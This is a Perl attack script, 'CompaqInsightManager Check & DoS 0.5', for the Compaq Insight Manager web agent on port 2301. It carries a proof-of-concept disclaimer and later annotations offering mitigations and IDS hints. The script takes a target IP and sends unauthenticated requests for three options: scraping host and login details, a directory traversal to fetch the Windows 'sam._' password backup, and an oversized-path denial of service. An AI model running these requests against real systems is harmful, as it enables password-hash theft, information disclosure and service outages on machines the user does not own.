
CompaqInsightManager Check & DoS 0.5


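Checks for the Compaq Insight Manager (CIM) web server, which listens on port 2301.
Shows information about the host running CIM, tries to retrieve the 'SAM._' backup file, and offers a 'DenialOfService' option. All three requests are sent without authentication, so the exposure depends on port 2301 being reachable from untrusted networks.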
/* ---------------------------------------------------------- */
#!/usr/bin/perl
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# -- Looks for CompaqInsightManager webserver.
#
# -- Changes : configurable host, port and DoS
# -- Changed & updated by Gert <c> 2000
# -- http://www.isaan.org/
#
# Start-up section: clears the screen, prints the banner and collects the
# target. The script has no 'use strict' / 'use warnings' and declares nothing
# with 'my', so $host, $port and every variable set later are package globals
# shared with the subs below.
# 'cls' is the Windows shell command for clearing the console.
system ('cls');
use IO::Socket;
print("==================================================================\n");
print("======= CompaqInsightManager WEBserver info / check / DoS ========\n");
print("======= Code by Gert Fokkema <c>2000  http://www.isaan.org =======\n");
print("======= Beta version 0.5  Comments mailto:  cim\@isaan.org ========\n");
print("==================================================================\n");

print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
print(">: ");
# The target is read verbatim from STDIN. There is no chomp and no validation,
# so $host keeps its trailing newline (later prints rely on that newline).
$host = <STDIN>;
# CompaqInsightManager running on port 2301
print("Enter the port number of the host to connect e.g. 2301 : \n");
print(">: ");
# The port prompt is cosmetic: reading it is commented out, the port is fixed
# to 2301 and the script echoes "2301" as if it had been typed.
#$port = <STDIN>;
$port = 2301;
print ("2301\n");
#
# queryselect
#
# CompaqInsightManager standard query "/cpqlogin.htm?" or "index.html"
# Interactive menu. Reads one line from STDIN, sets the global $query to the
# request path for the chosen check, calls &connect, redraws the prompts and
# then calls itself again.
#
# Control flow: the sub never returns normally. Every path ends in another
# &queryselect call, and the only ways out are the exit in &quit and the die
# in &connect. Statements that follow a recursive call are therefore never
# reached, and the call depth grows by one with every menu round.
#
# Input handling: the line is compared with numeric '==' without chomp or
# validation. Non-numeric text evaluates to 0 and so takes the QUIT branch;
# the "Input not valid" path is reached only by numbers other than 0-3.
# The prompt advertises "1,2,3,4" but only 0-3 are handled.
#
# What a defender sees on the wire for each option (all unauthenticated GETs
# to TCP 2301, built in &connect):
#   1 - the agent's login page, /cpqlogin.htm?
#   2 - a path containing '../' sequences that leaves the web root
#   3 - a path of roughly 1 KB of 'A' characters
sub queryselect
{
print("Select query to check for --1,2,3,4-- : \n");
print("1 : WEBserver INFO\n");
print("2 : WEBserver 'root dot dot vulnerability'\n");
print("3 : WEBserver DenialOfService attack\n");
print("0 : QUIT\n");
print("< : ");
$query_select = <STDIN>;
# 0 = QUIT
if($query_select == 0)
        {
        $query="";
        print "Selected type  : QUIT\n";
        # &quit calls exit, so nothing after this line runs.
        &quit;
        }
# 1 = INFO $query="/cpqlogin.htm?"
if($query_select == 1)
        {
        $query="/cpqlogin.htm?";
        print "Selected type  : INFO\n";
        print "Selected query     : '/cpqlogin.htm?'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls');
        # Redraw the start-up prompts with the values already entered;
        # "$host" ends the line because it still carries its newline.
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
# 2 = directory traversal, $query="/../../../winnt/repair/sam._"
# The path climbs out of the web root with '../' and names the repair copy of
# the SAM database. Mitigation belongs on the server side: the agent must
# canonicalise the request path and refuse anything that resolves outside its
# document root. For detection, a request URI containing '/../' on port 2301
# is a simple log or IDS match.
if($query_select == 2)
        {
        $query="/../../../winnt/repair/sam._";
        print "Selected type  : root dot dot vulnerability\n";
        print "Selected query     : '/../../../winnt/repair/sam._'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls'); 
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
# 3 = oversized request path (the original comment labelled this "INFO").
# The string literal below spans several source lines, so the value assigned
# to $query contains embedded newlines between the runs of 'A'.
# A server that bounds the request-line length and rejects longer requests
# is not affected by this kind of input; unusually long URIs on port 2301
# are also easy to alert on.
if($query_select == 3)
        {
        $query = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        print "Selected type  : DenialOfService attack\n";
        # Only an abbreviated form of the path is echoed to the operator.
        print "Selected query     : 'AAAAAAAAAA'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls'); 
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
# Fallback for any number other than 0-3: report, redraw, ask again.
print("Input not valid...try again!!\n");
sleep(2);
system ('cls');
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
&queryselect;
}
# Program entry: start the menu loop. This call does not return; the script
# ends through the exit in &quit or the die in &connect.
&queryselect;
#
# connect
#
# Opens a TCP connection to the global $host:$port, sends one HTTP GET for the
# global $query, reads the whole response and prints four lines of it as
# system name, login name, private IP and public IP.
#
# Shares its name with Perl's builtin connect(); the script always calls it as
# &connect, which selects this user-defined sub.
# Dies (ending the script) when the connection cannot be opened.
#
# Defensive reading: nothing here authenticates. Whatever option 1 prints was
# returned by the agent to an anonymous client, so keeping TCP 2301 off
# untrusted networks is the control that matters for this script.
sub connect
{
print("==================================================================\n");
# No "\n" here: $host still ends in the newline read from STDIN.
print("Connecting to ip-address      : $host");
print("Trying connect host at port   : $port\n");
print("Query to check for            : $query\n");
print("==================================================================\n");
# Defaults shown when the response has fewer lines than expected.
$privatename="unknown\n";
$username="unknown\n";
$privateip="unknown\n";
$publicip="unknown\n";
# Unbuffer STDOUT (done twice; the second statement repeats the first two).
select STDOUT;
$| = 1;
select(STDOUT); $| = 1;
$handle = IO::Socket::INET->new(Proto => "tcp",
                                PeerAddr  => $host,
                                PeerPort  => $port, Reuse=>1)
|| die ">: connect failed to port $port on $host...exiting ;-(\n";
#                  or die "can't connect to port $port on $host: $!";
print ">: connect succesfull to port $port on $host...checking query ;-)\n";
$handle->autoflush(1);
# Request as sent: the path is followed by a literal backslash ("\\" in the
# double-quoted string), a "Translate: f" header is added, line endings are a
# mix of bare LF and CRLF, and there is no Host header and no credentials.
# Those traits (backslash before " HTTP/1.0", bare-LF request line) may be
# usable as a log or IDS signature for this script - verify against captures.
print $handle "GET $query\\ HTTP/1.0\nTranslate: f\r\n\n";
# $info is assigned but not used anywhere in this script.
$info = "";
$count=0;
# Read the response line by line. $content is a global that is never reset,
# so it keeps growing across calls; it is only used by the commented-out
# debug print below.
# Field extraction is purely positional: response lines 13, 36, 56 and 57 are
# taken as system name, login name, private IP and public IP. Presumably this
# matches the login-page layout of the agent version the author tested -
# TODO confirm; for any other response the "fields" are arbitrary lines.
while ($line = <$handle>)
        {$content = $content . $line;
        $count += 1;
#}
        if ($count == 13)
               {
               $privatename = $line;
               }
        else{}
        if ($count == 36)
               {
               $username = $line;
               }
        else{}
        if ($count == 56)
               {
               $privateip = $line;
               }
        else{}
        if ($count == 57)
               {
               $publicip = $line;
               }
        else{}
}
close $handle;
# $socket is never assigned in this script, so this close has no open handle
# to act on.
close($socket);
#print "Content-type: text/plain\n\n";
#print $content;
print("\n");
print("             ==========================================\n");
print "             == CompaqInsightManager WEBserver Info: ==\n";
print("             ==========================================\n");
# The same four-field report is printed for every menu option, including the
# traversal and oversized-path requests, whatever the server answered.
print ("System name : $privatename");
print ("Login name  : $username");
print ("Private IP  : $privateip");
print ("Public IP   : $publicip");
print("==================================================================\n");
}
# Ends the script: closes the handles, prints a final message and exits.
# $handle is the global set by &connect (unset if no check was run);
# $socket is never assigned anywhere in this script.
sub quit
{
close $handle;
close($socket);
print("localhost: done...");
# No exit status is given, so the process ends with Perl's default status.
exit
}
/* ---------------------------------------------------------- */
Credits
-- UnKnown --
